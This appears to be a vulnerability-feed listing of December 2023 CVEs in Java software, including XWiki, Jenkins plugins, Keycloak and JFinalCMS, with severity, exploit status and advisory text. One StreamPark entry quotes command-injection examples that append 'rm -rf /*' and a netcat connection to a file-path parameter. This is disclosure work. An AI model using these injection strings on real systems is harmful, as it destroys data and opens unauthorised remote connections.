|
CVE-2023-50578
|
Critical
|
2023-12-30
|
Protected by RASP
|
Working exploit published
|
Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do.
|
|
CVE-2023-49299
|
High
|
2023-12-30
|
No exploit published
|
No public exploit
|
Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9.
Users are recommended to upgrade to version 3.1.9, which fixes the issue.
|
|
CVE-2023-41544
|
Critical
|
2023-12-30
|
No exploit published
|
No public exploit
|
SSTI injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to execute arbitrary code via crafted HTTP request to the /jmreport/loadTableData component.
|
|
CVE-2023-41543
|
Critical
|
2023-12-30
|
Protected by RASP
|
No public exploit
|
SQL injection vulnerability in jeecg-boot v3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check.
|
|
CVE-2023-41542
|
Critical
|
2023-12-30
|
Protected by RASP
|
Proof of concept only
|
SQL injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component.
|
|
CVE-2023-7148
|
High
|
2023-12-29
|
No exploit published
|
No public exploit
|
A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151.
|
|
CVE-2023-50572
|
Medium
|
2023-12-29
|
No exploit published
|
No public exploit
|
An issue in the component GroovyEngine.execute of jline-groovy v3.24.1 allows attackers to cause an OOM (OutofMemory) error.
|
|
CVE-2023-50571
|
High
|
2023-12-29
|
No exploit published
|
No public exploit
|
easy-rules-mvel v4.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component MVELRule.
|
|
CVE-2023-50570
|
Medium
|
2023-12-29
|
No exploit published
|
No public exploit
|
An issue in the component IPAddressBitsDivision of IPAddress v5.1.0 leads to an infinite loop. This is disputed because an infinite loop occurs only for cases in which the developer supplies invalid arguments. The product is not intended to always halt for contrived inputs.
|
|
CVE-2023-51084
|
Critical
|
2023-12-27
|
No exploit published
|
Proof of concept only
|
hyavijava v6.0.07.1 was discovered to contain a stack overflow via the ResultConverter.convert2Xml method.
|
|
CVE-2023-51080
|
High
|
2023-12-27
|
No exploit published
|
No public exploit
|
The NumberUtil.toBigDecimal method in hutool-core v5.8.23 was discovered to contain a stack overflow.
|
|
CVE-2023-51079
|
Medium
|
2023-12-27
|
No exploit published
|
No public exploit
|
A long execution time can occur in the ParseTools.subCompileExpression method in MVEL 2.5.0.Final because of many Java class lookups. NOTE: the vendor disputes this because "the only thing that you could expect is that the parser will take a crazy amount of time to complete its task."
|
|
CVE-2023-51075
|
High
|
2023-12-27
|
No exploit published
|
No public exploit
|
hutool-core v5.8.23 was discovered to contain an infinite loop in the StrSplitter.splitByRegex function. This vulnerability allows attackers to cause a Denial of Service (DoS) via manipulation of the first two parameters.
|
|
CVE-2023-51074
|
Medium
|
2023-12-27
|
No exploit published
|
No public exploit
|
json-path v2.8.0 was discovered to contain a stack overflow via the Criteria.parse() method.
|
|
CVE-2023-3171
|
High
|
2023-12-27
|
Protected by RASP
|
No public exploit
|
A flaw was found in EAP-7 during deserialization of certain classes, which permits instantiation of HashMap and HashTable with no checks on resources consumed. This issue could allow an attacker to submit malicious requests using these classes, which could eventually exhaust the heap and result in a Denial of Service.
|
|
CVE-2023-27150
|
Medium
|
2023-12-26
|
No exploit published
|
Proof of concept only
|
openCRX 5.2.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name field after creation of a Tracker in Manage Activity.
|
|
CVE-2023-50730
|
High
|
2023-12-22
|
No exploit published
|
No public exploit
|
Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn't checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioural characteristics would be needed.
Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query.
The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing.
|
|
CVE-2023-51656
|
Critical
|
2023-12-21
|
Protected by RASP
|
No public exploit
|
Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.
Users are recommended to upgrade to version 1.2.2, which fixes the issue.
|
|
CVE-2023-50732
|
High
|
2023-12-21
|
No exploit published
|
No public exploit
|
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1.
|
|
CVE-2023-46131
|
High
|
2023-12-21
|
No exploit published
|
No public exploit
|
Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0.
|
|
CVE-2023-2585
|
High
|
2023-12-21
|
No exploit published
|
No public exploit
|
Keycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client.
|
|
CVE-2023-37544
|
High
|
2023-12-20
|
No exploit published
|
No public exploit
|
Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication.
This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0.
The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature.
2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5.
2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2.
3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1.
3.1 Pulsar WebSocket Proxy users are unaffected.
Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.
|
|
CVE-2023-6927
|
Medium
|
2023-12-18
|
No exploit published
|
No public exploit
|
A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt" which could be used to bypass the security patch implemented to address CVE-2023-6134.
|
|
CVE-2023-6911
|
Medium
|
2023-12-18
|
No exploit published
|
No public exploit
|
Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.
|
|
CVE-2023-5384
|
High
|
2023-12-18
|
No exploit published
|
No public exploit
|
A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration.
|
|
CVE-2023-5236
|
Medium
|
2023-12-18
|
No exploit published
|
No public exploit
|
A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.
|
|
CVE-2023-3629
|
Medium
|
2023-12-18
|
No exploit published
|
No public exploit
|
A flaw was found in Infinispan's REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.
|
|
CVE-2023-3628
|
Medium
|
2023-12-18
|
No exploit published
|
No public exploit
|
A flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.
|
|
CVE-2023-6886
|
Critical
|
2023-12-17
|
No exploit published
|
No public exploit
|
A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.
|
|
CVE-2023-6837
|
High
|
2023-12-15
|
No exploit published
|
No public exploit
|
Multiple WSO2 products have been identified as vulnerable to perform user impersonatoin using JIT provisioning. In order for this vulnerability to have any impact on your deployment, following conditions must be met:
* An IDP configured for federated authentication and JIT provisioning enabled with the "Prompt for username, password and consent" option.
* A service provider that uses the above IDP for federated authentication and has the "Assert identity using mapped local subject identifier" flag enabled.
Attacker should have:
* A fresh valid user account in the federated IDP that has not been used earlier.
* Knowledge of the username of a valid user in the local IDP.
When all preconditions are met, a malicious actor could use JIT provisioning flow to perform user impersonation.
|
|
CVE-2023-6836
|
High
|
2023-12-15
|
Protected by RASP
|
No public exploit
|
Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.
|
|
CVE-2023-6835
|
Medium
|
2023-12-15
|
No exploit published
|
No public exploit
|
Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated.
|
|
CVE-2023-50723
|
Critical
|
2023-12-15
|
No exploit published
|
No public exploit
|
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages.
|
|
CVE-2023-50722
|
Critical
|
2023-12-15
|
No exploit published
|
No public exploit
|
XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn't require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`.
|
|
CVE-2023-50721
|
Critical
|
2023-12-15
|
No exploit published
|
Forecast only
|
XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`.
|
|
CVE-2023-50720
|
Medium
|
2023-12-15
|
Mitigation candidate
|
Working exploit published
|
XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.
|
|
CVE-2023-50719
|
High
|
2023-12-15
|
Mitigation candidate
|
Working exploit published
|
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
|
|
CVE-2023-49898
|
High
|
2023-12-15
|
Protected by RASP
|
No public exploit
|
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.2
Example:
##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
|
|
CVE-2023-46279
|
Critical
|
2023-12-15
|
Protected by RASP
|
No public exploit
|
Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5.
Users are recommended to upgrade to the latest version, which fixes the issue.
|
|
CVE-2023-30867
|
Medium
|
2023-12-15
|
Protected by RASP
|
No public exploit
|
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.
Mitigation:
Users are recommended to upgrade to version 2.1.2, which fixes the issue.
|
|
CVE-2023-29234
|
Critical
|
2023-12-15
|
Protected by RASP
|
No public exploit
|
A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4.
Users are recommended to upgrade to the latest version, which fixes the issue.
|
|
CVE-2023-6563
|
High
|
2023-12-14
|
No exploit published
|
No public exploit
|
An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (> 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the "consents" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.
|
|
CVE-2023-6134
|
Medium
|
2023-12-14
|
No exploit published
|
No public exploit
|
A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748.
|
|
CVE-2023-50137
|
Medium
|
2023-12-14
|
No exploit published
|
No public exploit
|
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office.
|
|
CVE-2023-50102
|
Medium
|
2023-12-14
|
No exploit published
|
No public exploit
|
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS).
|
|
CVE-2023-50101
|
Medium
|
2023-12-14
|
No exploit published
|
No public exploit
|
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via Label management editing.
|
|
CVE-2023-50100
|
Medium
|
2023-12-14
|
No exploit published
|
No public exploit
|
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing.
|
|
CVE-2023-46750
|
Medium
|
2023-12-14
|
No exploit published
|
Proof of concept only
|
URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro.
Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.
|
|
CVE-2023-6379
|
Medium
|
2023-12-13
|
Mitigation candidate
|
Working exploit published
|
Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.
|
|
CVE-2023-50779
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Missing permission checks in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified URL using an attacker-specified token.
|
|
CVE-2023-50778
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
A cross-site request forgery (CSRF) vulnerability in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using an attacker-specified token.
|
|
CVE-2023-50777
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.
|
|
CVE-2023-50776
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.
|
|
CVE-2023-50775
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs.
|
|
CVE-2023-50774
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
A cross-site request forgery (CSRF) vulnerability in Jenkins HTMLResource Plugin 1.02 and earlier allows attackers to delete arbitrary files on the Jenkins controller file system.
|
|
CVE-2023-50773
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.
|
|
CVE-2023-50772
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins Dingding JSON Pusher Plugin 2.0 and earlier stores access tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.
|
|
CVE-2023-50771
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins, allowing attackers to perform phishing attacks.
|
|
CVE-2023-50770
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins OpenId Connect Authentication Plugin 2.6 and earlier stores a password of a local user account used as an anti-lockout feature in a recoverable format, allowing attackers with access to the Jenkins controller file system to recover the plain text password of that account, likely gaining administrator access to Jenkins.
|
|
CVE-2023-50769
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
|
|
CVE-2023-50768
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
|
|
CVE-2023-50767
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML.
|
|
CVE-2023-50766
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to send an HTTP request to an attacker-specified URL and parse the response as XML.
|
|
CVE-2023-50765
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID.
|
|
CVE-2023-50764
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system.
|
|
CVE-2023-47327
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
The "Create a Space" feature in Silverpeas Core 6.3.1 is reserved for use by administrators. This function suffers from broken access control, allowing any authenticated user to create a space by navigating to the correct URL.
|
|
CVE-2023-47326
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function.
|
|
CVE-2023-47325
|
Medium
|
2023-12-13
|
No exploit published
|
Proof of concept only
|
Silverpeas Core 6.3.1 administrative "Bin" feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces.
|
|
CVE-2023-47324
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Silverpeas Core 6.3.1 is vulnerable to Cross Site Scripting (XSS) via the message/notification feature.
|
|
CVE-2023-47323
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators.
|
|
CVE-2023-47322
|
High
|
2023-12-13
|
No exploit published
|
No public exploit
|
The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF with execute making the attacker an administrator user in the application.
|
|
CVE-2023-47321
|
Medium
|
2023-12-13
|
No exploit published
|
No public exploit
|
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Porlet Deployer" which allows administrators to deploy .WAR portlets.
|
|
CVE-2023-47320
|
High
|
2023-12-13
|
No exploit published
|
Proof of concept only
|
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. This affects Silverpeas Core 6.3.1 and below.
|
|
CVE-2023-5379
|
High
|
2023-12-12
|
No exploit published
|
No public exploit
|
A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user could to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS).
|
|
CVE-2023-50424
|
Critical
|
2023-12-12
|
No exploit published
|
No public exploit
|
SAP BTP Security Services Integration Library ([Golang] github.com/sap/cloud-security-client-go) - versions < 0.17.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
|
|
CVE-2023-50422
|
Critical
|
2023-12-12
|
No exploit published
|
No public exploit
|
SAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) - versions below 2.17.0 and versions from 3.0.0 to before 3.3.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
|
|
CVE-2023-3517
|
High
|
2023-12-12
|
No fix identified
|
No public exploit
|
Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including
8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources.
|
|
CVE-2023-28465
|
High
|
2023-12-12
|
Protected by RASP
|
Proof of concept only
|
The package-decompression feature in HL7 (Health Level 7) FHIR Core Libraries before 5.6.106 allows attackers to copy arbitrary files to certain directories via directory traversal, if an allowed directory name is a substring of the directory name chosen by the attacker. NOTE: this issue exists because of an incomplete fix for CVE-2023-24057.
|
|
CVE-2023-26920
|
Medium
|
2023-12-12
|
No exploit published
|
No public exploit
|
fast-xml-parser before 4.1.2 allows __proto__ for Prototype Pollution.
|
|
CVE-2018-16153
|
High
|
2023-12-12
|
No exploit published
|
No public exploit
|
An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. It sends system digest credentials during authentication attempts to arbitrary external services in some situations.
|
|
CVE-2023-50449
|
High
|
2023-12-10
|
Protected by RASP
|
No public exploit
|
JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.
|
|
CVE-2023-6394
|
Critical
|
2023-12-09
|
No exploit published
|
No public exploit
|
A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions.
|
|
CVE-2023-49487
|
Medium
|
2023-12-08
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the navigation management department.
|
|
CVE-2023-49486
|
Medium
|
2023-12-08
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the model management department.
|
|
CVE-2023-49485
|
Medium
|
2023-12-08
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department.
|
|
CVE-2023-50164
|
Critical
|
2023-12-07
|
No exploit published
|
Proof of concept only
|
An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.
Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.
|
|
CVE-2023-6393
|
Medium
|
2023-12-06
|
No exploit published
|
No public exploit
|
A flaw was found in the Quarkus Cache Runtime. When request processing utilizes a Uni cached using @CacheResult and the cached Uni reuses the initial "completion" context, the processing switches to the cached Uni instead of the request context. This is a problem if the cached Uni context contains sensitive information, and could allow a malicious user to benefit from a POST request returning the response that is meant for another user, gaining access to sensitive data.
|
|
CVE-2023-26154
|
Medium
|
2023-12-06
|
No exploit published
|
No public exploit
|
Versions of the package pubnub before 7.4.0; all versions of the package com.pubnub:pubnub; versions of the package pubnub before 6.19.0; all versions of the package github.com/pubnub/go; versions of the package github.com/pubnub/go/v7 before 7.2.0; versions of the package pubnub before 7.3.0; versions of the package pubnub/pubnub before 6.1.0; versions of the package pubnub before 5.3.0; versions of the package pubnub before 0.4.0; versions of the package pubnub/c-core before 4.5.0; versions of the package com.pubnub:pubnub-kotlin before 7.7.0; versions of the package pubnub/swift before 6.2.0; versions of the package pubnub before 5.2.0; versions of the package pubnub before 4.3.0 are vulnerable to Insufficient Entropy via the getKey function, due to inefficient implementation of the AES-256-CBC cryptographic algorithm. The provided encrypt function is less secure when hex encoding and trimming are applied, leaving half of the bits in the key always the same for every encoded message or file.
**Note:**
In order to exploit this vulnerability, the attacker needs to invest resources in preparing the attack and brute-force the encryption.
|
|
CVE-2023-49448
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via admin/nav/delete.
|
|
CVE-2023-49447
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/update.
|
|
CVE-2023-49446
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/save.
|
|
CVE-2023-49398
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/delete.
|
|
CVE-2023-49397
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/updateStatus.
|
|
CVE-2023-49396
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/save.
|
|
CVE-2023-49395
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/update.
|
|
CVE-2023-49383
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/tag/save.
|
|
CVE-2023-49382
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/div/delete.
|
|
CVE-2023-49381
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/div/update.
|
|
CVE-2023-49380
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/friend_link/delete.
|
|
CVE-2023-49379
|
High
|
2023-12-05
|
No exploit published
|
No public exploit
|
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /admin/friend_link/save.
|